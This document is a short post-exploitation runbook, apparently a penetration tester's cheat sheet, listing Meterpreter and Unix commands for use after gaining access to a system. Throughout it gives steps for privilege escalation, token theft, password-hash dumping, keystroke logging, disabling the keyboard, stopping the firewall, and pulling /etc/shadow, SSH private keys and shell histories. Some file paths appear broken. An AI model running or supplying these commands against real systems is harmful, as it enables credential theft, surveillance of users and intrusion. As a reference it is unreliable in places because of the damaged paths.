Meterpreter Post-Auth Runbook

Meterpreter Post-exploitation Modules

  • > use post/windows/gather/enum_logged_on_users

  • Railgun - Meterpreter extension that allows direct access to Windows APIs

  • IRB - Ruby shell in Meterpreter

Meterpreter Post Auth

  • Info gathering

    • getuid

    • getpid

    • getprivs

    • sysinfo

    • screenshot

    • run winenum.rb

    • run scraper.rb

    • run checkvm

    • run credcollect

    • run get_local_subnets

  • Priv Esc

    • ps then migrate

    • getsystem

  • Tokens

    • list_tokens -u

    • impersonate_token

    • steal_token [pid]

    • rev2self

  • Retrieve passwords

    • hashdump

    • cachedump

    • post/windows/gather/smart_hashdump

    • post/windows/gather/credentials/vnc

  • Session

    • enumdesktops

    • getdesktop

    • setdesktop

    • uictl disable keyboard

  • keylog

    • keyscan_start

    • keyscan_dump

    • keyscan_stop

Nix Post Auth

  • Disable Firewall

    • /etc/init.d/iptables save

    • /etc/init.d/iptables stop

    • iptables-save > /root/firewall.rules

    • iptables-restore < /root/firewall.rules

  • Files to pull

    • /etc/passwd

    • /etc/shadow OR /etc/security/shadow

    • /etc/group OR /etc/gshadow

    • /home//.ssh/id

    • /etc/sudoers

  • User Information

    • grep ^ssh /home//.hist

    • grep ^telnet /home//.hist

    • grep ^mysql /home//.hist*
